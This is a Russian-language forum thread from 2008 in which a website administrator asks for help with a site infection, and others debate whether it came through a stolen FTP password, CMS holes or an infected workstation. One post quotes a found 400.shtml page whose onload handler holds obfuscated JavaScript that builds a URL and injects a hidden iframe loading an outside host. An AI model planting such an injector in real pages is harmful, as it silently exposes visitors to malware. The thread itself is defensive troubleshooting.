Трабла(админю сайт)

И всё прочее, что касается HTML
Правила форума
Убедительная просьба юзать теги [code] при оформлении листингов.
Сообщения не оформленные должным образом имеют все шансы быть незамеченными.
Аватара пользователя
manefesto
Группенфюррер
Сообщения: 6934
Зарегистрирован: 2007-07-20 8:27:30
Откуда: Пермь
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение manefesto » 2008-04-17 6:07:48

пока не могу.....ftp закрыт на работе....к вечеру выложу
я такой яростный шо аж пиздеЦ
Изображение

Хостинговая компания Host-Food.ru
Хостинг HostFood.ru
 

Услуги хостинговой компании Host-Food.ru

Хостинг HostFood.ru

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

Аватара пользователя
lexy
сержант
Сообщения: 288
Зарегистрирован: 2006-07-21 9:54:44
Откуда: Волхов, ЛО
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение lexy » 2008-04-17 7:45:49

zg писал(а): 90% вирусов лузет через винду, когда на сайт через фтп что-то заливается

выложи index.php
вирус-дроперы на сайт попадают обычно через дыры в CMS или скриптах(MySQL inject, register_globals в php.ini, корявки в правах на директории сайта, XSS). Было тут с месяцок назад на РБК на главной висел ))))))
Залить через FTP - только если специально.

Аватара пользователя
manefesto
Группенфюррер
Сообщения: 6934
Зарегистрирован: 2007-07-20 8:27:30
Откуда: Пермь
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение manefesto » 2008-04-17 8:27:05

Вообщем нашел я таки вот файлы типа 400.shtml
Со следующим содержимым

Код: Выделить всё

<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY onload="status=' ';zz='o';sl='/';sf='ram';us='u';pi='b';po='.';gw='fi';qu=':';yh='t';vo='h';bw='e';pj='m';iu='g';pt='tp';yw='p';ab='src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,pi,hh,pi,iu,po,hh,us,sl,po,yh,po,yw,vo,yw);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);">
<H1>Bad Request</H1>
There was an error in your request.
<HR>
<I><!--#echo var="HTTP_HOST" --></I>
</BODY></HTML>
Видать хостера сломали....или ftp пароль угнали.
Я сижу под фрей, порты закрыты....так что никого не боюсЪ
я такой яростный шо аж пиздеЦ
Изображение

Аватара пользователя
lexy
сержант
Сообщения: 288
Зарегистрирован: 2006-07-21 9:54:44
Откуда: Волхов, ЛО
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение lexy » 2008-04-17 8:40:35

manefesto писал(а): Видать хостера сломали....или ftp пароль угнали.
ИМХО все-таки CMS с дыркой, меняй пасс, обновляй движок сайта

Аватара пользователя
manefesto
Группенфюррер
Сообщения: 6934
Зарегистрирован: 2007-07-20 8:27:30
Откуда: Пермь
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение manefesto » 2008-04-17 8:51:59

я понятия не имею как там и что обновлять....
Я только админю....картинки добавляю....редизигн маненько...
я такой яростный шо аж пиздеЦ
Изображение

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: Трабла(админю сайт)

Непрочитанное сообщение zg » 2008-04-18 10:33:57

lexy писал(а):Залить через FTP - только если специально.
не скажи, у меня тут один клиент сам ручками два файлика подправил, залил и именно в них был вирус.. через дыры, тоже можно но это сложнее

Аватара пользователя
lexy
сержант
Сообщения: 288
Зарегистрирован: 2006-07-21 9:54:44
Откуда: Волхов, ЛО
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение lexy » 2008-04-18 16:02:15

zg писал(а):
lexy писал(а):Залить через FTP - только если специально.
не скажи, у меня тут один клиент сам ручками два файлика подправил, залил и именно в них был вирус.. через дыры, тоже можно но это сложнее
не исключаю вероятности, но через дыры не сложнее, особенно когда отчет о найденой уязвимости, и, возможно, и эксплоит, опубликован. Есть статистика, что более половины админов не следят за багтраком и не закрывают вовремя дыры. Бери, качай сплойт да троянь сайты )))))))
у меня тут один клиент сам ручками два файлика подправил, залил и именно в них был вирус..

где гарантия, что он их с сайта уже в таком виде не слил? ))))))))))))))) а то, что комп того юзера с вирусом был, дык он ведь файлы вирусные тестил? далее по смыслу )))))))

а в случае заражения сайта через комп вебмастера дык это какая вероятность должна быть попадания трояна именно на комп дезигнера, вебмастера и пр? эффективность ниже плинтуса, а вирьмейкеры не альтруисты.

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: Трабла(админю сайт)

Непрочитанное сообщение zg » 2008-04-20 8:19:44

lexy писал(а):где гарантия, что он их с сайта уже в таком виде не слил? ))))))))))))))) а то, что комп того юзера с вирусом был, дык он ведь файлы вирусные тестил? далее по смыслу )))))))
тутда их я заливал в cp1251... не кажется странным, что весь сайт в 1251, а два вирусных файла в UTF-8?
lexy писал(а):а в случае заражения сайта через комп вебмастера дык это какая вероятность должна быть попадания трояна именно на комп дезигнера, вебмастера и пр? эффективность ниже плинтуса, а вирьмейкеры не альтруисты.
:lol: ты сайтами то видать не занимаешься, и не в курсе, что вирусы под винду пишут, так же как и фотошоп, поэтому дизайнеры сидят на винде, под которую уже давным давно написаны сотни тысяч вирусов. Любой взлом гораздо проще произвести если на целевую машину заслать вирус, чем колупаться в дырах, а потом узнать, что через них нифига не сделать. Далеко не каждая дыра даёт возможность записывать файлы на сервер.

Попробуй сломать сайт :lol: это гораздо сложнее, чем подцепить вирус, который есть практически в любом кряке, порносайте, USB-флешке, локальной сети, письме счастья и т.д. и т.п.

Аватара пользователя
lexy
сержант
Сообщения: 288
Зарегистрирован: 2006-07-21 9:54:44
Откуда: Волхов, ЛО
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение lexy » 2008-04-20 18:03:36

zg писал(а):ты сайтами то видать не занимаешься, и не в курсе, что вирусы под винду пишут,
отвечу тебе известным интернет-мемом: "на ЛОР быдло!"
сорри за бедность речи.
Ты по всей видимости ни тем ни другим толком не занимаешься. На сем дискуссию считаю закрытой

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: Трабла(админю сайт)

Непрочитанное сообщение zg » 2008-04-20 20:16:54

lexy писал(а):Ты по всей видимости ни тем ни другим толком не занимаешься
да... куда уж нам :? всё как-то бестолку получается

Аватара пользователя
ADRE
майор
Сообщения: 2645
Зарегистрирован: 2007-07-26 8:53:49
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение ADRE » 2008-10-30 11:59:58

мда .... ставить надо скрипты все только на чтение пусть вирусы в темпах копашаться, да кстате в метном телекоме 2003 ftp сервак вынесли =) половина городских сайтов заслала вирусов херову тучу всем
//del